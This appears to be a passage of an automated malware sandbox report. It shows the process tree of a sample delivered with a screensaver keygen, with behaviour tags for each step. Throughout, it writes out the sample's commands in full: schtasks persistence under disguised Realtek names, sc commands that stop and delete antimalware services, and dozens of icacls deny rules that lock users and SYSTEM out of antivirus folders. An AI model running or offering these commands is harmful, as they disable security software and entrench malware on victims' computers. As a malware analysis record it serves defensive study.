C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3176
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:4480
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵
- System Location Discovery: System Language Discovery
PID:3544 -
C:\Windows\SysWOW64\sc.exesc start appidsvc5⤵
- Launches sc.exe
PID:4984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt4⤵PID:4932
-
C:\Windows\SysWOW64\sc.exesc start appmgmt5⤵
- Launches sc.exe
PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵PID:852
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto5⤵
- Launches sc.exe
PID:4840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto4⤵
- System Location Discovery: System Language Discovery
PID:720 -
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵PID:1060
-
C:\Windows\SysWOW64\sc.exesc delete swprv5⤵
- Launches sc.exe
PID:5016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵PID:2364
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice5⤵
- Launches sc.exe
PID:396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵
- System Location Discovery: System Language Discovery
PID:3304 -
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice5⤵
- Launches sc.exe
PID:236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵PID:2924
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice5⤵
- Launches sc.exe
PID:4512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵PID:1160
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice5⤵
- Launches sc.exe
PID:3084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵PID:4952
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵PID:3180
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵PID:3432
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵PID:656
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵PID:716
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵PID:552
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:72
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)4⤵PID:3352
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵PID:3400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:988
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:340
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)4⤵PID:1384
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵PID:2868
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)4⤵PID:1524
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵PID:4144
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)4⤵PID:4168
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵PID:3332
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)4⤵PID:3776
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:396
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵PID:248
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)4⤵PID:3356
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵PID:4512
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)4⤵PID:2488
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2924
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)5⤵
- Modifies file permissions
PID:1160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- System Location Discovery: System Language Discovery
PID:984 -
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
- Modifies file permissions
PID:756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)4⤵PID:2072
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)5⤵
- Modifies file permissions
PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵PID:916
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)4⤵PID:2028
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:1480 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2188 -
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)4⤵PID:4660
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)4⤵PID:4656
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵PID:4820
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)4⤵PID:3628
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)4⤵PID:4608
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)4⤵PID:2828
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)4⤵PID:3412
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)4⤵PID:4204
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)4⤵PID:800
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)4⤵PID:5000
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2368 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)4⤵PID:4680
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2096 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)4⤵PID:3808
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)4⤵PID:2188
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)4⤵PID:716
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)4⤵PID:5012
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:4660 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)4⤵PID:3192
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:1448 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)4⤵PID:3224
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:4088
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)4⤵PID:236
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵PID:3204
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)4⤵PID:4416
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)4⤵PID:3156
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:1860 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)4⤵PID:3140
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)4⤵PID:4192
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)4⤵PID:2096
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)4⤵PID:3808
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)4⤵PID:2540
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)4⤵PID:5028
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
PID:2552 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)4⤵PID:960
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵PID:1268
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)4⤵PID:1488
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3600
-
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:884
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetWindowsHookEx
PID:5780
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetWindowsHookEx
PID:4872 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 6085⤵
- Program crash
PID:5196
-
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:1928
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetWindowsHookEx
PID:4896
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:3668
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵PID:3372
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵PID:9008
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵PID:7336
-
-
C:\ProgramData\Google Updater 2.0\ymy9m915c99k95m.exe/prstb4⤵PID:9636
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F75D08\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F75D08\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"3⤵
- Executes dropped EXE
PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\7zO42F3ED08\wwf[1].exe"C:\Users\Admin\AppData\Local\Temp\7zO42F3ED08\wwf[1].exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3040 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe4⤵
- Looks for VMWare services registry key.
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:908 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5464 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5492 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Modifies firewall policy service
- Event Triggered Execution: Image File Execution Options Injection
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:5560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 10808⤵
- Program crash
PID:5960
-
-
-
-
-
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe/prstb5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5168 -
C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"C:\ProgramData\Google Updater 5.0\o37oc73i7.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5176 -
